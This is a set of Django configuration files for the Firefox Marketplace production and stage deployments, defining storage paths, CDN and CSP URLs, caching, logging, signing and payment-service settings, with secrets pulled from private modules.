TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
# ES_INDEXES doesn't change for prod.
BUILDER_UPGRADE_URL = "https://builder.addons.mozilla.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
# Load-balancer / proxy IPs whose X-Forwarded-For headers are trusted.
KNOWN_PROXIES += ['10.32.124.20']
EMAIL_BLACKLIST = private.EMAIL_BLACKLIST
NEW_FEATURES = True
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
XSENDFILE_HEADER = 'X-Accel-Redirect'
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith.firefox.com'
GEOIP_URL = 'http://geo.marketplace.firefox.com'
# New Relic runs only on the whitelisted web heads.
NEWRELIC_WHITELIST = ['web1.addons.phx1.mozilla.com',
                      'web10.addons.phx1.mozilla.com',
                      'web20.addons.phx1.mozilla.com',
                      'web1.mktweb.services.phx1.mozilla.com',
                      'web4.mktweb.services.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
from .. import splitstrip
import private_mkt
SERVER_EMAIL = '[email protected]'
SECRET_KEY = private_mkt.SECRET_KEY
# Production domain/site URL, overridable through the private module.
DOMAIN = getattr(private_mkt, 'DOMAIN', 'marketplace.firefox.com')
SITE_URL = getattr(private_mkt, 'SITE_URL', 'https://' + DOMAIN)
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace.cdn.mozilla.net/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
# CSP sources use the CDN host without the trailing slash.
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
# --- CDN URL layout for user-uploaded media (production) ---
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
# Override settings_base: full previews keep their original extension ('%s'),
# not a fixed '.png'.
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + 'img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'marketplace.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplace"
SYSLOG_TAG2 = "http_app_addons_marketplace_timer"
SYSLOG_CSP = "http_app_addons_marketplace_csp"
# Redis
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
    'cache': REDIS_BACKEND,
    'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
    'master': REDIS_BACKENDS_MASTER,
    'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERYD_PREFETCH_MULTIPLIER = 1
LOGGING['loggers'].update({
    'z.task': { 'level': logging.DEBUG },
    'z.hera': { 'level': logging.INFO },
    'z.redis': { 'level': logging.DEBUG },
    'z.receipt': {'level': logging.ERROR },
    'elasticutils': {'level': logging.INFO },
    'caching': {'level': logging.ERROR },
})
STATSD_PREFIX = 'marketplace'
GRAPHITE_PREFIX = STATSD_PREFIX
CEF_PRODUCT = STATSD_PREFIX
IMPALA_BROWSE = True
IMPALA_REVIEWS = True
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
# Drop the CSP middleware ('csp' is bound in settings_base) in prod.
MIDDLEWARE_CLASSES = tuple(m for m in MIDDLEWARE_CLASSES if m not in (csp,))
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.firefox.com',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
                  'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
# Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace.cdn.mozilla.net']
# Bug 793876
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
CARRIER_URLS = splitstrip(private_mkt.CARRIER_URLS)
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
# Heka logging client: CEF via syslog plugin, shipped over UDP.
HEKA_CONF = {
    'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
        'syslog_facility': 'LOCAL4',
        # CEF_PRODUCT is defined in settings_base
        'syslog_ident': CEF_PRODUCT,
        'syslog_priority': 'INFO'
        }),
    },
    'stream': {
        'class': 'heka.streams.UdpStream',
        'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
        'port': private.HEKA_CONF_SENDER_PORT,
    },
    'logger': 'addons-marketplace-prod',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# Payment settings.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
# This must match private.SECRET in webpay settings.
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
if NEWRELIC_ENABLE:
    NEWRELIC_INI = '/etc/newrelic.d/marketplace.firefox.com.ini'
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
# IARC content ratings.
IARC_COMPANY = 'Mozilla'
IARC_ENV = 'prod'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCProdService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCProdRating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = False
BOKU_SIGNUP_URL = 'https://developer.mozilla.org/en-US/Marketplace/Publishing/Pricing/Providers/Boku'
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = 'https://controller.apk.firefox.com/application.apk'
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
NEWRELIC_WHITELIST = ['web19.stage.addons.phx1.mozilla.com',
'web20.stage.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
SERVER_EMAIL = '[email protected]'
# Stage environment domain/site URL.
# NOTE(review): DOMAIN used to be assigned twice with the same value (once
# before SERVER_EMAIL, once after); the redundant first assignment was removed.
DOMAIN = "marketplace.allizom.org"
SITE_URL = 'https://marketplace.allizom.org'
SERVICES_URL = SITE_URL
# Stage CDN for static assets, overridable via the CUSTOM_CDN env var.
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
# CSP sources use the CDN host without the trailing slash.
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
# Icon URLs for uploaded add-on icons, served from the CDN.
# NOTE(review): a second, older ADDON_ICON_URL assignment used to precede this
# one ("%s/%s/%s/images/addon_icon/..." built from LANGUAGE_CODE/DEFAULT_APP);
# it was dead code, immediately overwritten by the line below, so it has been
# removed.  The uploads-based URL below is the only value that ever took effect.
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
#STATSD_CLIENT = 'django_statsd.clients.moz_heka'
SYSLOG_TAG = "http_app_addons_marketplacestage"
SYSLOG_TAG2 = "http_app_addons_marketplacestage_timer"
SYSLOG_CSP = "http_app_addons_marketplacestage_csp"
STATSD_PREFIX = 'marketplace-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
# mock the authentication and use django_fakeauth for this
AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
+ AUTHENTICATION_BACKENDS
MIDDLEWARE_CLASSES.insert(
MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
'django_fakeauth.FakeAuthMiddleware')
FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
# we are also creating access tokens for OAuth, here are the keys and
# secrets used for them
API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
# Bug 748403: receipt signing service for this environment.
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-cdn.allizom.org']
# Bug 793876: packaged-app signing servers; reviewers get a separate
# signing endpoint from the public one.
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
# Heka logging client: CEF security events go out via the syslog plugin,
# everything else streams over UDP to the central heka collector.
HEKA_CONF = {
    'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
        'syslog_facility': 'LOCAL4',
        # CEF_PRODUCT is defined in settings_base
        'syslog_ident': CEF_PRODUCT,
        'syslog_priority': 'INFO'
        }),
    },
    'stream': {
        'class': 'heka.streams.UdpStream',
        # NOTE(review): splitstrip presumably turns a comma-separated host
        # string into a list -- confirm against its definition.
        'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
        'port': private.HEKA_CONF_SENDER_PORT,
    },
    'logger': 'addons-marketplace-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# In-app/app purchase JWT settings. See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-stage/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Stage'
ENABLE_API_ERROR_SERVICE = True
NEWRELIC_INI = '/etc/newrelic.d/marketplace.allizom.org.ini'
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
# Monolith (metrics) Elasticsearch index pattern for stage.
MONOLITH_INDEX = 'mktstage-time_*'
# IARC content ratings. Stage talks to the IARC demo/test environment, with
# real (non-mocked) requests.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
# APK factory: pre-generate Android APK wrappers for apps on stage.
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = \
    'https://apk-controller.stage.mozaws.net/application.apk'
# Boku carrier-billing merchant signup URL (opaque encoded params).
BOKU_SIGNUP_URL = 'https://merchants.boku.com/signup/signup_business?params=jEHWaTM7zm5cbPpheT2iS4xB1mkzO85uxVAo7rs7LVgy5JYGMWnUYDvxyEk8lxalP1pJZFv5d9oI%0A9bcXqxv0MQ%3D%3D'
########NEW FILE########
__FILENAME__ = mkt
mkt.wsgi
########NEW FILE########
__FILENAME__ = zamboni
zamboni.wsgi
########NEW FILE########
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.